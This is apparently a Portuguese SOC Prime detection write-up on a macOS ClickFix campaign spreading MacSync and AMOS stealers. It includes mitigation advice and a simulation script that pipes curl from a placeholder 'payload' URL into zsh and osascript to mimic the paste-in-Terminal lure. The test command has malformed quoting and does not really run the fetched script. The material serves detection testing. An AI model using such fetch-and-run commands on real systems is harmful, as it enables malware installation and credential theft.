SOC Prime Bias: Alto

10 Aug 2026 16:48 UTC

Campanha ClickFix do macOS Evolui com Portões de Infecção Ocultos

Author Photo
SOC Prime Team linkedin icon Seguir
Campanha ClickFix do macOS Evolui com Portões de Infecção Ocultos
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma campanha do ClickFix para macOS está distribuindo ladrões de dados, incluindo MacSync e Atomic Stealer (AMOS), através de um sofisticado portal de impressão digital no lado do servidor. A operação utiliza domínios gerados algoritmicamente e impressão digital do navegador para garantir que cargas maliciosas sejam entregues apenas a usuários genuínos de macOS, ajudando a evitar análises de segurança automatizadas e rastreadores. Esta evolução marca uma mudança de engenharia social ampla para técnicas de entrega altamente direcionadas e ocultas.

Investigação

A Inteligência de Ameaças da Microsoft rastreou um cluster de mais de 250 domínios compartilhando um padrão de nomenclatura distinto para descobrir a campanha. A investigação revelou uma transição da entrega direta de iscas para um processo de duas etapas envolvendo perfilagem leve em JavaScript. Avaliando sinais WebGL, offsets de fuso horário e verificações anti-análise, os pesquisadores determinaram como a infraestrutura seleciona alvos em ambientes macOS enquanto apresenta conteúdo disfarce benigno a requisições não qualificadas.

Mitigação

As organizações devem educar os usuários de que atualizações legítimas de software não requerem colagem de comandos no Terminal. As equipes de segurança devem monitorar atividades suspeitas no Terminal envolvendo utilitários como curl, base64, gunzip, ou osascript, particularmente quando desencadeadas após a navegação na web. Fortalecer proteções em torno dos dados do Keychain e monitorar arquivamentos não autorizados de arquivos sensíveis também pode reduzir o impacto de um comprometimento bem-sucedido.

Resposta

Se a execução suspeita no Terminal ou o acesso não autorizado a armazenamentos de credenciais for detectado, os respondedores devem isolar imediatamente o ponto final macOS afetado. Investigue conexões de saída para domínios de baixa reputação, com atenção especial para padrões de requisição /curl/ . Hosts de estágio maliciosos identificados devem ser bloqueados, e o histórico recente do shell deve ser revisado para execução de comandos codificados ou ofuscados.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria e Base deve ter passado.

Justificação: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa do Ataque & Comandos: O adversário inicia uma campanha ClickFix apresentando uma mensagem de erro falsa em um navegador web, instruindo o usuário a “Corrigir o erro” colando um comando específico no Terminal. O objetivo do atacante é estabelecer persistência ou baixar malware. O comando utiliza curl para extrair uma carga maliciosa do AppleScript de um servidor remoto e canaliza para osascript -e para executá-lo imediatamente na memória, contornando a varredura tradicional baseada em arquivos.

  • Script de Teste de Regressão:

    # Simulação do ClickFix: Buscando uma carga útil e executando via osascript
    # Nota: Usamos um comando de eco inócuo para simular a carga útil remota para evitar uma infecção real.
    
    curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Alerta de Segurança: Atualização de Sistema Requerida""'
    
    # Para garantir que a regra de detecção seja acionada, executamos o padrão exato:
    osascript -e 'say "Este é um ataque simulado"'
  • Comandos de Limpeza:

    # Nenhum arquivo é gravado em disco nesta execução de linha de comando específica, 
    # mas garantimos que qualquer processo em segundo plano seja encerrado.
    killall osascript || true